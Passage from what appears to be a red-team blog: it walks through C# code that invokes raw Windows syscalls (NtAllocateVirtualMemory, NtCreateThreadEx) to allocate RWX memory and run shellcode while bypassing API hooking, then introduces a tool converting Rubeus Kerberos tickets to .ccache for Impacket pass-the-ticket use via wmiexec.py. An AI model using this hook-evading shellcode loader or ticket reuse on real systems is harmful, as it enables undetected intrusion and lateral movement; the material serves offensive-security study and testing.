Starting from the top, we can see the C/C++ definition of NtAllocateVirtualMemory, as well as the assembly for the syscall itself. Starting at line 38, we have the C# definition of NtAllocateVirtualMemory. Note that it can take some trial and error to get each type in C# to match up with the unmanaged type. We create a pointer to our assembly inside an unsafe block. This allows us to perform operations in C#, like operating on raw memory, that are normally not safe in managed code. We also use the fixed keyword to make sure the C# garbage collector does not inadvertently move our memory around and change our pointers. Once we have a raw pointer to the memory location of our syscall stub, we need to change its memory protection to executable so it can be run directly, as it will be used as a function pointer and not just data. Note that I am using the Win32 API VirtualProtectEx to change the memory protection. I'm not aware of a way to do this via syscall, as it's a chicken-and-egg problem: the memory holding the syscall stub has to be executable before we can make any syscall. If anyone knows how to do this in C#, please reach out! Another thing to note here is that setting memory to RWX is generally somewhat suspicious, but as this is a POC, I'm not too worried about that at this point. We're concerned with hooking right now, not memory scanning!
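
Since that screenshot is hard to read in text form, here is a condensed sketch of the same pattern. Names follow the POC where I know them, the DELEGATES struct is shown in the next section, and the whole thing must be compiled with /unsafe; treat it as a sketch, not the repo's exact code:

using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Runtime.InteropServices;

class Syscalls
{
    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

    // The stub bytes encode: mov r10,rcx / mov eax,18h / syscall / ret
    // (0x18 = NtAllocateVirtualMemory on the Windows 10 build targeted here).
    static byte[] syscallStub = { 0x4C, 0x8B, 0xD1, 0xB8, 0x18, 0x00, 0x00, 0x00, 0x0F, 0x05, 0xC3 };

    public static UInt32 NtAllocateVirtualMemory(IntPtr processHandle, ref IntPtr baseAddress,
        IntPtr zeroBits, ref IntPtr regionSize, UInt32 allocationType, UInt32 protect)
    {
        unsafe
        {
            // Pin the stub so the garbage collector cannot move it out from under us.
            fixed (byte* ptr = syscallStub)
            {
                IntPtr memoryAddress = (IntPtr)ptr;

                // The stub lives in a read/write managed array; mark it RWX so it can execute.
                uint oldProtect;
                if (!VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress,
                        (UIntPtr)(uint)syscallStub.Length, 0x40 /* PAGE_EXECUTE_READWRITE */, out oldProtect))
                    throw new Win32Exception(Marshal.GetLastWin32Error());

                // Wrap the raw pointer in a callable delegate and invoke the syscall.
                var assembledFunction = (DELEGATES.NtAllocateVirtualMemory)Marshal.GetDelegateForFunctionPointer(
                    memoryAddress, typeof(DELEGATES.NtAllocateVirtualMemory));
                return assembledFunction(processHandle, ref baseAddress, zeroBits, ref regionSize, allocationType, protect);
            }
        }
    }
}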

Now comes the magic. This is the struct where our delegates are declared:

Delegates Struct
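
In text form, the struct looks roughly like this (a sketch with only the NtAllocateVirtualMemory delegate shown; the signature mirrors the native definition above):

public struct DELEGATES
{
    [UnmanagedFunctionPointer(CallingConvention.StdCall)]
    public delegate UInt32 NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress,
        IntPtr ZeroBits, ref IntPtr RegionSize, UInt32 AllocationType, UInt32 Protect);
}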

Note that a delegate definition is just a function signature and return type. The implementation is up to us, as long as it matches the delegate definition, and it's what we're implementing here in the C# NtAllocateVirtualMemory function. At line 65 above, we create a delegate named assembledFunction, which takes advantage of the special marshaling function Marshal.GetDelegateForFunctionPointer. This method allows us to get a delegate from a function pointer. In this case, our function pointer is the pointer to the syscall assembly called memoryAddress. assembledFunction is now a function pointer to an assembly language function, which means we're now able to execute our syscall! We can call the assembledFunction delegate like any normal function, complete with arguments, and we will get the results of the NtAllocateVirtualMemory syscall. So in our return statement we call assembledFunction with the arguments that were passed in and return the result. Let's look at where we actually call this function in Program.cs:

Calling NtAllocateMemory

Here you can see we make a call to NtAllocateVirtualMemory instead of the Win32 API VirtualAlloc that Win32Injector uses. We set up the function call with all the needed arguments (lines 43-48) and make the call to NtAllocateVirtualMemory. This returns a block of memory for our shellcode, just like VirtualAlloc would!
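
In sketch form, the call site looks something like this (the shellcode byte array comes from earlier in the program; the constants are the usual Win32 values):

// Let the kernel pick the address; ask for enough room for the shellcode.
IntPtr hProcess = Process.GetCurrentProcess().Handle;
IntPtr baseAddress = IntPtr.Zero;
IntPtr regionSize = (IntPtr)shellcode.Length;

UInt32 status = Syscalls.NtAllocateVirtualMemory(hProcess, ref baseAddress, IntPtr.Zero,
    ref regionSize, 0x3000 /* MEM_COMMIT | MEM_RESERVE */, 0x40 /* PAGE_EXECUTE_READWRITE */);
// An NTSTATUS of 0 (STATUS_SUCCESS) means baseAddress now points at our new region.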

The remaining steps are similar:

Remaining Syscalls
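
In sketch form, those remaining calls look roughly like this. ntCreateThreadEx and ntWaitForSingleObject are delegate instances built from their stubs exactly as before, and the NtCreateThreadEx parameter list follows badBounty's definition, so treat the exact signature as an assumption:

// Copy the shellcode into the region we just allocated.
Marshal.Copy(shellcode, 0, baseAddress, shellcode.Length);

// Create a thread in our own process that starts executing at the shellcode.
IntPtr hThread = IntPtr.Zero;
ntCreateThreadEx(out hThread, 0x1FFFFF /* THREAD_ALL_ACCESS */, IntPtr.Zero, hProcess,
    baseAddress, IntPtr.Zero, false /* run immediately */, 0, 0, 0, IntPtr.Zero);

// Block until the shellcode thread exits (a NULL timeout pointer means wait forever).
ntWaitForSingleObject(hThread, false, IntPtr.Zero);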

We copy our shellcode into our newly-allocated memory, and then create a thread within our current process pointing to that memory via another syscall, NtCreateThreadEx, in place of CreateThread. Finally, we wait on the new thread with a call to the syscall NtWaitForSingleObject, instead of WaitForSingleObject. Here's the final result:

Hello World Shellcode

Hello world via syscall! Assuming this was some sort of payload running on a system with API hooking enabled, we would have bypassed it and successfully run our payload.

A note on native code

Some key parts of this puzzle I’ve not mentioned yet are all of the native structs, enumerations, and definitions needed for the syscalls to function properly. If you look at the screenshots above, you will see types that don’t have implementations in C#, like the NTSTATUS return type for all the syscalls, or the AllocationType and ACCESS_MASK bitmasks. These types are normally declared in various Windows headers and DLLs, but to use syscalls we need to implement them ourselves. The process I followed to find them was to look for any non-simple type and try to find a definition for it. Pinvoke.net was massively helpful for this task. Between it and other resources like MSDN and the ReactOS source code, I was able to find and add everything I needed. You can find that code in the Native.cs class of the solution here.
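
For a flavor of what ends up in Native.cs, here are two illustrative definitions (the values are the standard documented ones; the full set is in the repo):

// NTSTATUS is just a 32-bit status code; zero (STATUS_SUCCESS) means the call succeeded.
public const UInt32 STATUS_SUCCESS = 0x00000000;

// Allocation flags that Windows headers normally provide, reimplemented as a C# enum.
[Flags]
public enum AllocationType : uint
{
    Commit  = 0x1000,
    Reserve = 0x2000,
    Release = 0x8000,
}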

Wrapup

Syscalls are fun! It’s not every day you get to combine 3 different languages, managed and unmanaged code, and several levels of Windows APIs in one small program. That said, there are some clear difficulties with syscalls. They require a fair bit of boilerplate code to use, and that boilerplate is scattered all around for you to find like a little undocumented treasure hunt. Debugging can also be tricky with the transition between managed and unmanaged code. Finally, syscall numbers change frequently and have to be customized for the platform you’re targeting. D/Invoke seems to handle several of these issues rather elegantly, so I’m excited to dig into those more soon.

Rubeus to Ccache

17 May 2020 at 15:20


I wrote a new little tool called RubeusToCcache recently to handle a use case I come across often: converting the Rubeus output of Base64-encoded Kerberos tickets into .ccache files for use with Impacket.

Background

If you’ve done any network penetration testing, red teaming, or Hack The Box/CTFs, you’ve probably come across Rubeus. It’s a fantastic tool for all things Kerberos, especially when it comes to tickets and Pass The Ticket/Overpass The Hash attacks. One of the most commonly used features of Rubeus is the ability to request/dump TGTs and use them in different contexts in Rubeus or with other tools. Normally Rubeus outputs the tickets in Base64-encoded .kirbi format, .kirbi being the file type commonly used by Mimikatz. The Base64 encoding makes it very easy to copy and paste and generally make use of the TGT in different ways.

You can also use acquired tickets with another excellent toolset, Impacket. Many of the Impacket tools can use Kerberos authentication via a TGT, which is incredibly useful in a lot of different contexts, such as pivoting through a compromised host so you can Stay Off the Land. Only one problem: Impacket tools use the .ccache file format to represent Kerberos tickets. Not to worry though, because Zer1t0 wrote ticket_converter.py (included with Impacket), which allows you to convert .kirbi files directly into .ccache files. Problem solved, right?

Rubeus To Ccache

Mostly solved, because there’s still the fact that Rubeus spits out .kirbi files Base64 encoded. Is it hard or time-consuming to do a simple little [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64RubeusTGT)) to get a .kirbi and then use ticket_converter.py? Not at all, but it’s still an extra step that gets repeated over and over, making it ripe for a little automation. Hence Rubeus to Ccache.

You pass it the Base64-encoded blob Rubeus gives you, along with a file name for a .kirbi file and a .ccache file, and you get a fresh ticket in both formats, ready for Impacket. To use the .ccache file, make sure to set the appropriate environment variable: export KRB5CCNAME=shiny_new_ticket.ccache. Then you can use most Impacket tools like this: wmiexec.py domain/username@target -k -no-pass, where the -k flag indicates the use of Kerberos tickets for authentication.

Usage

╦═╗┬ ┬┌┐ ┌─┐┬ ┬┌─┐  ┌┬┐┌─┐  ╔═╗┌─┐┌─┐┌─┐┬ ┬┌─┐
╠╦╝│ │├┴┐├┤ │ │└─┐   │ │ │  ║  │  ├─┤│  ├─┤├┤
╩╚═└─┘└─┘└─┘└─┘└─┘   ┴ └─┘  ╚═╝└─┘┴ ┴└─┘┴ ┴└─┘
              By Solomon Sklash
          github.com/SolomonSklash
   Inspired by Zer1t0's ticket_converter.py

usage: rubeustoccache.py [-h] base64_input kirbi ccache

positional arguments:
  base64_input  The Base64-encoded .kirbi, such as from Rubeus.
  kirbi         The name of the output file for the decoded .kirbi file.
  ccache        The name of the output file for the ccache file.

optional arguments:
  -h, --help    show this help message and exit

Thanks

Thanks to Zer1t0 and the Impacket project for doing most of the heavy lifting.
